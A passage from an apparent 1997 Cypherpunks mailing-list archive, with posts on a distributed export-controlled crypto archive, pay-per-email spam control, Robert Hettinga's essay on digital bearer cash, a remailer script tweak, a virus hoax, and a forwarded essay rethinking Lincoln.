> undetectably modifying the ciphertext and still coming up with
> something which is a valid compressed packet is fairly low.  I wonder
> how low.  

If the plaintext is known, I could come up with a change to the last 8 bytes
that would be valid (well, perhaps not - I don't know ZIP compression
too well).
 

Gary






From sar at cynicism.com  Sun Aug 10 06:03:17 1997
From: sar at cynicism.com (sar)
Date: Sun, 10 Aug 1997 21:03:17 +0800
Subject: bulk postage fine (was Re: non-censorous spam control)
Message-ID: <3.0.2.32.19970809202249.008815a0@box.cynicism.com>



At 02:28 PM 8/3/97 +0100, you wrote:
>
>sar  writes:
>> At 06:32 AM 8/3/97 +1000, ? the Platypus {aka David Formosa} wrote:
>> 
>> >-----BEGIN PGP SIGNED MESSAGE-----
>> >
>> >On Sat, 2 Aug 1997, Adam Back wrote:
>> >
>> >> Next we choose a threshold say 1000 posts per day.  Seems hard to
>> >> imagine anyone generating manually over 1000 emails per day.  That's
>> >> more than 1 per minute for a 10 hour day.
>>
>> Take bugtraq which has over 12,000 subscribers. Each post to bugtraq would
>> send out 12,000 emails so it would cost aleph one 1200$ per post to his
>> list. I dont think anyone would want to run a mailing list under these
>> sorts of conditions.
>
>The way such pay for email systems as I see them would interface with
>your existing email system is that you would have a list of addresses
>which you would be happy to receive email from for free.
>

How about spam via trusted addresses, 1 out of 10 posts to this list seem
to be ads for something or other. Also what if I decide to subscribe to a
high volume list with a few email accounts and talk my friends into doing
the same. We also decide no to recieve mail from them for free. If we got
over 1000 mails in one day would they have to pay up 100$? and if so who
would they pay it to. People running mailing lists whould have to get
subscribers to verify that they added the list to their trusted address list. 






From mpj at ebible.org  Sun Aug 10 21:28:45 1997
From: mpj at ebible.org (Michael Paul Johnson)
Date: Sun, 10 Aug 1997 21:28:45 -0700 (PDT)
Subject: North American Crypto Archive status
Message-ID: <3.0.3.32.19970810222548.00923ad0@teal.csn.net>


-----BEGIN PGP SIGNED MESSAGE-----


WHAT HAPPENED TO THE NORTH AMERICAN CRYPTO ARCHIVE?

The North American Crypto Archive at http://www.sni.net/~mpj/crypto.htm is 
rather limited right now. I have deleted everything except the few files that 
I contributed to the site. This was to save money, since I suddenly lost some 
sponsors (who wish to remain anonymous, but I appreciate them greatly) who 
were paying for the costs associated with the site. I am still planning to 
resurrect the North American Crypto Archive, but this will likely take a 
while. I think that almost all of the files were successfully rescued before 
the site went down by at least one person. Note that much of what was there 
can be found by following the links at http://www.sni.net/~mpj/freecrypt.htm 
or by using appropriate search utilities.


WHY RESURRECT THE NORTH AMERICAN CRYPTO ARCHIVE?

1. To provide a place for U. S. and Canadian citizens to freely and openly 
exchange cryptographic information, papers, programs, etc., without fear of 
government reprisals.

2. To provide a friendly central repository for cryptographic libraries, 
code, and papers, thus making it easy to find and use such information.

3. To provide a reasonably high bandwith connection for North Americans.

4. To exercise "freedom of the press" and press towards a constitutional EAR.


HOW MUCH SPACE WILL THIS TAKE?

My total archive space was at about 125 megabytes, but it had been trimmed 
from what I would like to have. For example, downlevel versions of software 
were generally deleted, and some things that are historically and 
cryptographically interesting were not carried. I forsee usage of around 500 
megabytes or more in the near future if we can make room for it. The storage 
need not all be at the same site, however.


HOW MUCH BANDWIDTH WOULD IT TAKE?

I'd like to see at least ISDN connectivity. I've seen as many as 425 files 
downloaded in a day from the current archive. Again, the storage and loading 
need not all be at the same site.


WHAT DO YOU MEAN BY NOT HAVING ALL THE STORAGE AT ONE SITE?

I envision a new plan for running the archive such that one master index page 
(like the "export controlled" one at http://www.sni.net/~mpj/na) points to 
hidden directories all over the continent, wherever free space can be 
gleaned. The only requirements on the remote sites to maintain the "export 
controlled" status would be to maintain a cron job that changed the name of 
the hidden ftp directory containing the files on the same schedule and using 
the same key as used at the index site. For now, http://www.sni.net/~mpj/na 
can remain as the password-controlled index site. This does require a slight 
change to the architecture of the "export control" system in that the 
directory name would be a function of the current time (UTC) and a secret 
key, instead of being truly random like it is, now. The relative loss of 
security in this change is inisgnificant relative to the (obvious) weak links 
of the system. (Yes, I know that it can be defeated, but I also believe that 
the system complies with the EAR as well as most do, anyway.) The gain in 
this approach, of course, is that the index and ftp site need not reside on 
the same server, as long as the system clocks are reasonably well 
synchronized (within a few minutes).

One other advantage of having several sites is that popular files can be 
placed on several different servers to lower the average traffic from any one 
server and to make the system more robust against failures and overloads. The 
archive would still have a single point of failure (at least initially) in 
the index site, but that could also be replicated fairly easily as long as 
users don't mind obtaining a separate password from each index site.


WHAT REMOTE SITES DO YOU PLAN TO USE?

I've had several people make inquiries or make offers, some of which sound 
better than others. I hope that this one open letter answers all of the 
questions that I got. I am looking for sites that:

1. Are *nix-based (at least for now).
2. Have some free disk space and bandwidth that can be used for this cause.
3. Have GNU C++ installed (or at least are identical to a host that I have 
access to that does).
4. Grant me access to a shell account and an ftp account to maintain the 
site.
5. Grant me access to cron so that I can have the hidden-directory renaming 
program run at the right schedule.
6. Are likely to be available for a reasonably long term.
7. Are in the USA or Canada and controlled by a U. S. or Canadian citizen.


WHAT MAKES PEOPLE THINK THAT YOU WILL GET ALL OF THESE FREE RESOURCES?

The same thing that makes me think that people will donate otherwise idle CPU 
resources for the fun of cracking a DES key or factoring very large numbers.


HOW DOES THE "EXPORT CONTROL" SOFTWARE WORK?

Ahh... here is the meat of the message that keeps it on topic for coderpunks 
and sci.crypt:

First of all, it is important to understand the design restraints. The EAR 
states that mere posting of cryptographic software on the internet is not an 
export if guests must affirm a couple of things (see the regulations) and if 
there is some kind of check that the "address of the receiving computer is 
verified to be in the USA." Strict compliance with the latter is impossible, 
but if the guest's email address is in a domain not commonly used in the USA 
and Canada (.gov, .com, .org, .edu, .mil, .net, .us, or .ca), then I suspect 
the guest of lying and deny access. Naturally, this is imperfect, but it is 
honestly the best I could figure out how to do on a normal ISP shell account 
that gives me no CGI script access. This really boils down to the honor 
system. That is OK with me if it is OK with the U. S. Government, and the way 
I interpret the law, it is.

Given that, here is the process:

1. http://www.sni.net/~mpj/usa is an html form that asks 3 "magic" questions 
to verify eligibility to legally access the strong cryptographic software, as 
well as the guest's email address. The 3 questions all default such that the 
user must change each answer to be granted access. The email address must be 
correct, because the user name and password are sent back via email, not as a 
web page. The "submit" button sends this data to cgiemail, an application 
that Colorado SuperNet does allow me to use. This form also invites 
nonqualified guests to explore most of the same data via 
http://www.sni.net/~mpj/freecryp.htm (links to crypto sites outside of North 
America).

2. When cgiemail gets the data from the above form, it simply formats the 
data using a template I supplied and mails it to me at mpj at csn.net.

3. I have an incoming mail filter that checks for any automated messages from 
cgiemail (which all have a rather long fixed hexadecimal number for a subject 
line), and processes them. If the guest answered all 3 questions properly, 
and the email address given doesn't "look foreign," then a form letter is 
filled in with a valid user name and password and mailed to the given email 
address. (There are some other checks, like limiting the email address to one 
destination, etc.) Noncompliant requests are simply discarded (since the 
"thank you" message from the submission form really already answered them). I 
thought about a courteous denial letter, but most of the bogus submissions 
also have bogus email addresses, so I decided not to do that.

4. If our guest can spell his or her email address right (among other 
things), then the email message directs him or her to 
http://www.sni.net/~mpj/na with a valid user name and password.

5. http://www.sni.net/~mpj/na is password protected using the security 
features of the Apache web server (as slightly tweaked by Colorado SuperNet). 
This is the index of the files in the archive, which are in a subdirectory of 
a hidden directory with a non-obvious name.

6. The hidden directory names are changed periodically to discourage the use 
or posting of a copy of the page at http://www.sni.net/~mpj/na without 
password protection. The idea is that by the time the cheater posted it and 
anyone found it, the hidden directory names would have changed again, 
invalidating the renegade index. The index is altered on the same schedule to 
the same new names by a companion program. (Right now the same program does 
both tasks, using a truly random number based on the arrival times and CRCs 
of all of my mail, but this would have to change in the new distributed 
archive model).


IS THAT REALLY GOOD ENOUGH?

I think so. It is the best export control model that I have seen that doesn't 
lock out U. S. and Canadian citizens in the U. S. A. and Canada. I saw a 
little more elaborate system on a Microsoft web site for distributing some 
128-bit RC2 software, but it locked me out because it didn't like the way 
Colorado SuperNet registered their "whois" information. It also locked me out 
from work, since SSL connections can't get past our firewall. My model is 
much less likely to lock out a duly qualified guest, and it is much better 
than my old "warning message only" model that I used before crypto export 
regulations passed from the ITAR to the EAR.


WHAT ABOUT CRYPTO SITES OUTSIDE OF NORTH AMERICA?

Please keep them up, and be ready to mirror any information that might 
suddenly become legal to export from the USA on short notice. I say this 
because the EAR is being challenged in court, and it is likely that 
cryptographic software export regulations may be struck down. It is also 
likely that the U. S. Government may quickly move to replace those 
regulations with others in a very short amount of time after the EAR is 
struck down. I don't want to encourage anyone to violate currently active 
regulations, however. If you have a good cryptographic software site outside 
of North America, and it isn't on my list at 
http://www.sni.net/~mpj/freecrypt.htm, please let me know.


WHAT IS YOUR PGP KEY?

RSA key for PGP 2.6.x: ftp://ftp.csn.net/mpj/mpjkey.asc  (mpjA)
DH/DSS key for PGP 5.0: ftp://ftp.csn.net/mpj/mpjdhkey.asc (mpj at ebible.org)
(Note that my RSA key uses mpj at csn.net for an address. That old address still 
works.)


-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQEVAwUBM+6USm+Iqt/O4EnZAQFVFgf+IQq7oZavZxgMwT2530w7LWPkNLqlbG5z
BSi1QGasmZrumAuMOG7M28prFZVg2hzExKUejlSXao7ywa3fnzLb0BF8WlDlFsS/
ysSQTB1NLzgjm3L8pqImdNGrP6ECFSFsTm3KOGxuu/NAVfEyBaoV5VEwxlUJmWBu
ifsmv7aBOOfY4g2xa9XQay4+rIx4QTr6k6OJenJ0f+eLnC/JjG7Dz3n3Mh0vbu6p
Vc9ib9jjkv+eawKv5+BnFUNc/hILsnw1yPQuomc7/G/YMJwbd7Ps/+LVRqmg0oxD
ECLfAI/BI6KxUh8EDGH91SnSXNHAYwtA1puIrQka1zkPPTr/psA/fw==
=9Zof
-----END PGP SIGNATURE-----


Michael Paul Johnson    mailto:mpj at ebible.org (aka mpj at csn.net)
PO Box 1151             http://www.ebible.org/bible        <- Holy Bible
Longmont CO 80502-1151  http://www.sni.net/~mpj/crypto.htm <- Crypto archive
USA       

PGP RSA key fingerprint (mpjA): 3E67 A580 0DFB D16A  6D52 D3A9 1C07 4E41

PGP DSS/DH fingerprint: 28AE B775 DD65 62C7 0717  ECDA 448F E0C7 17D7 47BB









From jf_avon at citenet.net  Sun Aug 10 07:00:12 1997
From: jf_avon at citenet.net (jf_avon at citenet.net)
Date: Sun, 10 Aug 1997 22:00:12 +0800
Subject: If contradiction could kill...  [Re: The BIG Lie (Jesus Confesse
In-Reply-To: <33ED8713.EF5C078@cyberspacetechnologies.com>
Message-ID: <199708101354.JAA11229@cti06.citenet.net>



On 10 Aug 97 at 5:17, David D.W. Downey wrote:

> Neither do I walk *any* party line. (In fact I am registered as
> independant so that I am forced to be [...]

This sentence gave me good laughs!  Just a rhetorical question: *who* 
exactly _forces_  you ?

As an independent (of whatever plurality of entities), what prevents 
you to side with one of them?

JFA
If contradiction was killing  swiftly,  there would be no religions 
left....
-- 
Jean-Francois Avon, Pierrefonds(Montreal) QC Canada
  JFA Technologies, R&D physicists & engineers
  Instrumentation & control, LabView programming.
PGP keys: http://w3.citenet.net/users/jf_avon
     and: http://bs.mit.edu:8001/pks-toplev.html
PGP ID:C58ADD0D:529645E8205A8A5E F87CC86FAEFEF891 
PGP ID:5B51964D:152ACCBCD4A481B0 254011193237822C






From jya at pipeline.com  Sun Aug 10 07:10:45 1997
From: jya at pipeline.com (John Young)
Date: Sun, 10 Aug 1997 22:10:45 +0800
Subject: Patient Snoop Law Coming
Message-ID: <1.5.4.32.19970810135329.0068a144@pop.pipeline.com>



NYT reports today on a patient privacy law being sent
to Congress next month by the administration, the
"most significant since the Privacy Law of 1974."

Battles are expected over law-enforcement access
to medical data, interference with commercial marketing 
and limitation on snooping for public benefit.

   http://jya.com/patient.txt







From rah at shipwright.com  Sun Aug 10 10:01:39 1997
From: rah at shipwright.com (Robert Hettinga)
Date: Mon, 11 Aug 1997 01:01:39 +0800
Subject: e$: Carts, horses, other dromedaries, and the needle's eye of economics...
Message-ID: 




--- begin forwarded text


X-Sender: rah at mail.shipwright.com
Mime-Version: 1.0
Date: Sun, 10 Aug 1997 11:05:54 -0400
To: e$@thumper.vmeng.com
From: Robert Hettinga 
Subject: e$: Carts, horses, other dromedaries, and the needle's eye of
 economics...
Sender: 
Precedence: Bulk
List-Software: LetterRip 2.0 by Fog City Software, Inc.
List-Unsubscribe: 
List-Subscribe: 

At 5:51 pm -0400 on 8/9/97, Somebody wrote:


> I couldn't imagine more depressing news.  The linking of
> internet + banking + fraud + organized-crime + offshore is precisely the kind
> of negative publicity which will set back e$ <...> horribly.  I
> desperately wanna cry "Say it ain't so, Joe!"  Oh, well.  We move on.  All
> the more reason to find some topflight Swiss, Belgian, Brit or German bankers
> to play.  But, this will make _them_ doubly shy, too.

Agreed, but this Russia/Antigua thing is *really* not a big deal.
Expatriation of assets is a completely orthogonal issue to the adoption of
digital commerce and financial cryptography.

That's because financial cryptography is about vastly improving the
financial system, and not at all about killing the nation state to save our
freedom.

(I knew I'd get your attention with that one... :-))

Personally, I believe that the use of strong financial cryptography is the
way that the internet will bring about the death of the nation-state, and
I'll be extremely happy when that happens, just like a lot of
industrialists rejoiced in the decline and fall of the aristocracy.

However, the nation state will adopt financial cryptography and digital
bearer settlement because it *has* to, economically, the same way that
aristocracy adopted industrialism of its own economic necessity, an act
which ushered in the nation-state and their own political demise. Like all
technological progress, strong financial cryptography should enable you to
do better transactions much cheaper. Technological progress cannot be
commanded or stopped with a political decision, as any student of the
Spanish inquisition, or Stalin, or Mao, will attest.


Clearly, politics may be why you try to invent things in the first place.
Diffie invented public key cryptography and Chaum invented blind signatures
for political reasons, obviously, but their technologies themselves are
value neutral. They're just facts, not political opinions. Remember what
happened to government mandated technologies of the past, like synthetic
fuel subsidies and the 'alternative' energy debacle -- or Lysenko.

Paradoxically, even though people may invent things because of their
politics, the unpredictablity of invention's outcome is such that it is in
fact science -- reality -- that creates politics, and not the other way
around. The political cart cannot be put before the economic and
technological horse.


So, at the risk of using a "utilitarian" argument ;-), discussions about
the "politics" -- even the constitutionality -- of technology is a waste of
time. This is particularly the case in discussions about the politics of
financial cryptography, and, I daresay, all cryptography. It's the
economics of the technology that matters, and since financial cryptography
is by its very definition an economic technology, appeals to politics are
even more irrelevant in discussing it. Cypherpunks knew this a long time
ago, by resisting attempts to herd them into some kind of political action
committee or another. "Cypherpunks write code", and all that.  Of course,
it doesn't keep us all from political kibbitzing -- or writing the
occasional screed. :-).

Just like any successful technology, if a politician gets in the way of
financial cryptography, economic progress should eventually make so much
money that it simply buys him out of the way. If it can't afford to to do
that, then financial cryptography on public networks won't be adopted.
Cynical it may be, it's still that simple.


So, to my mind, the whole question of going offshore is now pretty much
immaterial. We understand now how to do the trustee/boundry-layer work at
any institional trustee bank. We're pretty much at the stage where we can
walk right into the front door as a customer of giant institutional banks
like State Street, or Banker's Trust, or Morgan Guarantee -- or even the
Fed itself. Any bank who wants to hold reserve accounts in trust and to
handle the funds transfer work on behalf of digital bearer cash users on
the net, which any of these kinds of banks will do now already for clients
like investment banks and mutual funds. We understand things well enough
now to plug the net right into the existing financial system, on simple
terms that it understands completely, without any legal problems
whatsoever. And, because of this, we can also turn right around and do all
the things we want to do on the net completely legally: blind signatures,
anonymous transactions, and all. And, frankly, we'll be cheered by the
financial and business community when we do, because we'll probably reduce
the cost of cash transactions by 3 or 4 orders of magnitude, or more, not
to mention creating *profitable* transaction sizes, from picodollar to
teradollar, never before seen in the financial community.

That's because the reason for adopting blind signature technology is not
that you will pay extra to use anonymous bearer certificates, absolutely
not. It's that because of their very anonymity, which enables you to trust
someone who you can never know, digital bearer certificates will probably
be much cheaper to use than non-anonymous digital cash or book-entry
settlement methods, just like cash would be cheaper to handle if it weren't
physical.  Which is, of course, the point of blind signatures in the first
place.


So, if people who sell pornography, or have illegal businesses, want to get
their money onto the net under newer bearer certificate market models like
trustee/underwriter, they should be able to use their own banks to do so,
like everyone else would. All criminals of any real stature have banks who
know them and love having them as customers anyway.

In addition, people will figure out other non-bank ways to get money onto
the net if they want to, especially if there's something to do with it when
the money gets there. I expect that there will be lots of net.smurfs who
will continually find new and better ways to convert meatcash into digital
cash, and law enforcement will have to use the same methods they use now,
probably at the same success rates they now have, to stop that activity.

Frankly, there's no difference between all that and the status quo anyway,
so I really don't anticpate the market for forensic accountants to crash
anytime soon.

It doesn't matter anyway.


All of this concern for potential illegal uses of e$ is in fact peripheral
to the main chance, the central economic fact that strong financial
cryptography on geodesic public networks, anonymity and all, is going to
revolutionize finance and it thus *will* end up legal in its own right,
whether it is or not today in your particular jurisdiction. The potential
for criminal use of financial cryptography is simply noise compared to the
techtonic economic benefit derived from having a ubiquitous geodesic
economy, and frankly, most people in the central bank and economic strategy
business know this. Ironically, these denizens of large central
bureaucracies are turning into some of the biggest behind the scenes
cheerleaders of the technology of financial cryptography.

They understand that a nation state which makes the mistake of
criminalizing or even controlling financial cryptography (and thus any
strong cryptography at all) will go the way of all the nations which
ignored the very industrialism which made them the powers they are now.
Just like the inquisition killed Spain as a world power when it killed
science (and thus literacy) in the name of religeon, effectively exiling
it's entire intellegencia to Amsterdam and London and Geneva, so too will
any nation state kill itself if it ignores internet bearer settlement.
Except that the "country" the money goes to will not be someplace like
Antigua, but the very net itself, which is everywhere and nowhere, all at
once.



Fortunately, we don't even have waste our breath making that argument. We
just need to develop the technology on the critical path, which means that
our business as developers and sellers of financial cryptography products
is to create the ability for people to spend money on the net with as
little concern as possible for who they are, biometrically. The cheapest
way to do that right now is to use a certificate purchaser's existing bank
to authenticate them, coupled with some combination of back-channel, and
eventually internet-tunneled, automatic teller network and ACH/Fedwire
transactions, all of which gets meatspace money in and out of a trustee's
reserve account.

This will solve all our authentication issues and make the user's money
convertable into digital bearer certificates, all with no great mental
leaps from the banking -- or regulatory -- communities.  All the
underwriter sees is an authorization from the trustee to issue
certificates, and then anonymous certificate exchanges after that. All the
trustee sees is authorization and a promise from the purchaser's bank to
wire funds to cover what for all intents and purposes is an ATM withdrawl.
All the purchaser's bank sees is a request from an account holder
equivalent to an ATM withdrawl or deposit. All the buyers and sellers see
is money and goods. :-). Nobody knows who does what to whom, anymore than
they do with handling and accounting for cash in meatspace, and every's
happy. And, ironically, everyone's accountable enough to the regulatory
authorities for the time being.


If we let the existing banking system handle the authentication at the
meat/net boundry layer in this fashion, all the feared jurisdictional and
regulatory problems for digital cash and digital bearer certificate finance
are instantly defined out of existance.

Even FinCEN itself knows it can't police cyberspace if book entries are
economically impossible there. They also know that they can do their jobs
just fine for the time being by tracing money up to the net, and watching
for it to come out somewhere else. Detective work will never go out of
style.


Fortunately for cryptoanarchists everywhere, financial assets will someday
just stay on the net, because the net is where the information that feeds
markets for financial assets will be in the first place, just like
industrial assets ended up in cities because that's where the information
to manuplate them was. The millenium will have arrived.


To continue in the millenial vein, we can continue to render unto Caesar
all the financial information he can force out of us in meatspace, because
the "kingdom" of net is where all the real money will eventually be, and he
can never go there. To beat our aforementioned and, only-apparently-defunct
wagon-pulling dromedary anology with a rather large ironic stick, it will
be easier to get a camel through the eye of a needle than it will be
maintain a nation-state in a net economy.

Even more fun, economic necessity dictates that the camel, or whatever
other, say asinine, dromedary you have in mind, will have to build the
needle's eye the rest of us will walk through, or they'll go out of
business.

Cheers,
Bob



-----------------
Robert Hettinga (rah at shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/




---------------------------------------------------------------------
Where people, networks and money come together: Consult Hyperion
http://www.hyperion.co.uk                    info at hyperion.co.uk
---------------------------------------------------------------------
Like e$? Help pay for it!  See 
Or, for e$/e$pam sponsorship, 
---------------------------------------------------------------------

--- end forwarded text



-----------------
Robert Hettinga (rah at shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/







From ldeliverer at hotmail.com  Sun Aug 10 11:07:14 1997
From: ldeliverer at hotmail.com (last deliverer)
Date: Mon, 11 Aug 1997 02:07:14 +0800
Subject: Using Hotmail as an exit remailer
Message-ID: <19970810175510.2691.qmail@hotmail.com>



Looks like hotmail is double spacing the output.  Easily fixed, change

  $msg = &escapetext(join("\r\n", ));
to
  $msg = &escapetext(join("", ));


______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com






From alan at ctrl-alt-del.com  Sun Aug 10 11:38:45 1997
From: alan at ctrl-alt-del.com (Alan)
Date: Mon, 11 Aug 1997 02:38:45 +0800
Subject: If contradiction could kill...  [Re: The BIG Lie (Jesus Confesse
In-Reply-To: <33ED8713.EF5C078@cyberspacetechnologies.com>
Message-ID: <3.0.2.32.19970810111937.03e0dcb0@ctrl-alt-del.com>



At 09:52 AM 8/10/97 -0500, jf_avon at citenet.net wrote:
>
>On 10 Aug 97 at 5:17, David D.W. Downey wrote:
>
>> Neither do I walk *any* party line. (In fact I am registered as
>> independant so that I am forced to be [...]
>
>This sentence gave me good laughs!  Just a rhetorical question: *who* 
>exactly _forces_  you ?

"The problem with being an anarchist is there are so many rules.  You have
to hate the government, attend the meetings, and pay your dues every month."

David Downey is just a big bundle of contradictions.

I would just be happy if he would learn about paragraphs.



>
>As an independent (of whatever plurality of entities), what prevents 
>you to side with one of them?
>
>JFA
>If contradiction was killing  swiftly,  there would be no religions 
>left....
>-- 
>Jean-Francois Avon, Pierrefonds(Montreal) QC Canada
>  JFA Technologies, R&D physicists & engineers
>  Instrumentation & control, LabView programming.
>PGP keys: http://w3.citenet.net/users/jf_avon
>     and: http://bs.mit.edu:8001/pks-toplev.html
>PGP ID:C58ADD0D:529645E8205A8A5E F87CC86FAEFEF891 
>PGP ID:5B51964D:152ACCBCD4A481B0 254011193237822C
>
---
|              "That'll make it hot for them!" - Guy Grand               |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano at teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.ctrl-alt-del.com/~alan/       |alan at ctrl-alt-del.com|






From stewarts at ix.netcom.com  Sun Aug 10 13:12:01 1997
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Mon, 11 Aug 1997 04:12:01 +0800
Subject: [Fwd: Virus Warning]]
In-Reply-To: <3.0.3.32.19970809051238.006d4908@pop.mhv.net>
Message-ID: <3.0.2.32.19970810125952.0068afac@popd.ix.netcom.com>



At 09:23 AM 8/9/97 -0400, David D.W. Downey wrote:
>Lynne is most definitely correct. In order for a viral infection to take
>place, execution of the attached file first take place. Even malicious
>MS Word and likeminded word processing macros must inevitably execute a
>binary file. This message was forwarded to me via an ISP Viral Alert
>program. I apologize for not including the fact of program execution as
>being the actual infecting point. To all those familiar and  unfamiliar
>with the way virii operate, please accept my sincere apologies.

Well, now that you've got a clue, make sure you send mail back to the
people who sent you this hoax educating them, and asking them to
follow up to the people who scared them into sending it on.
That way you can all have some Good Times...



#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk/pub/crypto/pgp
#   (If this is a mailing list or news, please Cc: me on replies.  Thanks.)






From azur at netcom.com  Sun Aug 10 13:33:40 1997
From: azur at netcom.com (Steve Schear)
Date: Mon, 11 Aug 1997 04:33:40 +0800
Subject: A peculiar notion
Message-ID: 



For those who think that a convenient liberal interpretation of our
Constituton, a 'la Justice Brenan, is a relatively recent phenomenon, I
offer:
---------------


		Rethinking Lincoln and his peculiar notion

By Joseph Sobran

War usually isn't worth the price, even when you win. A new collection of
essays, "The Costs of War: America's Pyrrhic Victories," edited by John V.
Denson (published by Transaction), takes a new look at our wars without the
mythology that portrays them as not only worthwhile but gloriOUB. The
contributors to this stimulating collection agree that most of our wars
have had the ultimate effect of strengthening government at the expense of
liberty and the rule of law.

One of the most provocative essays in the volume is the historian Richard
Gamble's essay "Rethinking Lincoln." Today Lincoln is a demigod to nearly
everyone, with intellectual celebrants on both the Left (Gerry Wills) and
the Right (Harry V. Jaffa). We seldom ask whether he was justified in
making war on the seceding states.

Yet in his own time, this was the crucial queation. The Southern states
declared their independence in emulation of the original 13 Colonies, and
many Northerners recognized their right to do ao.

On what grounda did Lincoln deny that right? On grounds that these states
permitted slavery? No, because that would have invalidated the 1776
Declaration, which Lincoln, like most Americans, held sacred. Some other
reason had to be found.

So Lincoln chose to call secession "rebellion" and "insurrection" - an
uprising against the sovereign Union. He managed thus, Mr. Gamble points
out, by subtituting for the actual early history of the Union his own
version of the American founding." Lincoln offered the. peculiar notion
that the Union had somehow pre-existed the

Constition, the Articles of Conderation, and even the Declaration of
Independence, and that no state, therefore, could withdraw from it. The
Union is older than the states," Lincoln argued; "and, in fact, it created
them as states."

But, as Jefferson Davis, the Confederate president, pointed out, the
Constitution had been "a compact between independent states." The powers
given to the federal government had been "delegated," and whatever is
delegated can be withdrawn. In fact, several states had ratified the
Cosstitution on the express condition that they could reclaim the delegated
powers and secede at any time.

Since the right of secession had been stipulated without challenge in 1789,
either the states had retained it or their ratifications had been invalid.
Lincoln simply ignored this dilemma. His argument implied that the states
had had no choice but to ratify the Censtitution, since they belonged to a
Union from which there was no exit. "In Lincoln's mind," Mr. Gamble
observes, "the Union was not only perpetual, antecedent to the
Constitution, and the creator of the very states that now sought to leave,
it was also a spiritual entity, the mystical expression of a People."

A superb lawyer, logician and rhetorician, Lincoln must have known how
feeble his argument was. Before becoming president, he had several times
affirmed the right of any people, sufficiently numerous for national
independence, to throw off, to revolutionize, their existing form of
government, and to establish such other in its stead as they may choose."
This was sound Jeffersonian doctrine, and his later sophistical attempts to
wriggle out of it must have embarrassed him.

In his prosecution of the war against the Confederacy, he claimed, with
similar sophistry, powers that, under the Constitution, properly belonged
to Congress, including the powers to raise an army and navy and to suspend
habeas corpus. He just)fied himself on grounds that Congress would have
done these things had it been in session-which Mr. Gamble calls a peculiar
defense of his behavior that conceded his guilt."

By Lincoln's wartime logic, no state can ever have the right to secede, no
matter how flagrantly the Constition is violated by the federal government.
The Civil War, waged in the name of the Declaration actually resulted in
the practical abrogation of its principle that any just government must
have "the consent of the governed."

Lincoln insisted that he was violating parts of the Constitution only to
save the whole; but the war ultimately left the interpretation of the
Constitution at the mercy of the government it is supposed to restrain.

In short, the Constitution itself was a casualty of Lincoln's war. A
Pyrrhic victory indeed.







From admin at CyberSpaceTechnologies.com  Sun Aug 10 13:38:11 1997
From: admin at CyberSpaceTechnologies.com (David D.W. Downey)
Date: Mon, 11 Aug 1997 04:38:11 +0800
Subject: The BIG Lie (Jesus Confesses)
In-Reply-To: <199708081253.GAA06495@wombat.sk.sympatico.ca>
Message-ID: <33EE5A35.4ED3CFD0@cyberspacetechnologies.com>



Alan wrote:
> 
> If you don't want to be treated like a fundie, don't act >like one.
> 
Whatever. So, evcen though I am not a fundie, I must say this in their
defense. So it's ok for you to bash the fundies, but not for them to
bash you. Hmm, who ever said turn-about is fair play must not have read
*your* rule book.

> Also...  There is a thing called "paragraphs".  Please >learn how to use them.  They will make you seem less like a >luser.
> 
Yes Mr. English teacher, sir. If how I write or type instead of the
content contained within shall be the basis of my losership, then there
is something wrong with the reader not the writer. (Besides, I use
Netscape under Linux 3.3 and there seems to be a problem with the
keyboard map. I've noticed it myself when I have read my own postbacks.
The message structure comes out differently than what I typed it in as.
It will take some time to track down the incorrect amappings. Please be
patient folks, and I will fix the  grammatical errors of my ways.)






From admin at CyberSpaceTechnologies.com  Sun Aug 10 17:49:07 1997
From: admin at CyberSpaceTechnologies.com (David D.W. Downey)
Date: Mon, 11 Aug 1997 08:49:07 +0800
Subject: A peculiar notion
In-Reply-To: 
Message-ID: <33EE9409.2D2AE95B@cyberspacetechnologies.com>



Steve Schear wrote:

> In short, the Constitution itself was a casualty of >Lincoln's war. A Pyrrhic victory indeed.
>
	For the first time in a long time, I've read a post that actually make
me seriously consider rethinking what I have been taught. I've studied
quite a bit in regards to US law and the Consitution, (made necessary by
my being Pro-PGP), and never looked in that direction. Your post adds a
very different light to things.  I took the liberty of forwarding your
post to a few of my old teachers, and they said that even they had not
looked at history from that point. Thank you for the push.






From anon at anon.efga.org  Sun Aug 10 17:49:42 1997
From: anon at anon.efga.org (Anonymous)
Date: Mon, 11 Aug 1997 08:49:42 +0800
Subject: Test
Message-ID: <2ePFheC6zDNaMpugt5DBwA==@JawJaCrakR>



test






From azur at netcom.com  Sun Aug 10 17:50:34 1997
From: azur at netcom.com (Steve Schear)
Date: Mon, 11 Aug 1997 08:50:34 +0800
Subject: A peculiar notion
In-Reply-To: 
Message-ID: 



>Steve Schear wrote:
>
>> In short, the Constitution itself was a casualty of >Lincoln's war. A
>>Pyrrhic victory indeed.
>>
>	For the first time in a long time, I've read a post that actually make
>me seriously consider rethinking what I have been taught. I've studied
>quite a bit in regards to US law and the Consitution, (made necessary by
>my being Pro-PGP), and never looked in that direction. Your post adds a
>very different light to things.  I took the liberty of forwarding your
>post to a few of my old teachers, and they said that even they had not
>looked at history from that point. Thank you for the push.

Even more disheartening is the realization that the war probably wasn't
ncesassary to free the slaves, as the South was already in decline and
slaves were leaving (via the Underground Railroad) in record numbers.  Like
the West's 'victory' over communism, there's good reason to believe that
the South would have collapsed sooner than later due to its untenable
economic structure.  It seems the war substantially fought over economic,
idiological and egotistical reasons.  Big sigh...

--Steve








From nobody at REPLAY.COM  Sun Aug 10 19:07:19 1997
From: nobody at REPLAY.COM (Anonymous)
Date: Mon, 11 Aug 1997 10:07:19 +0800
Subject: The BIG Lie (Jesus Confesses)
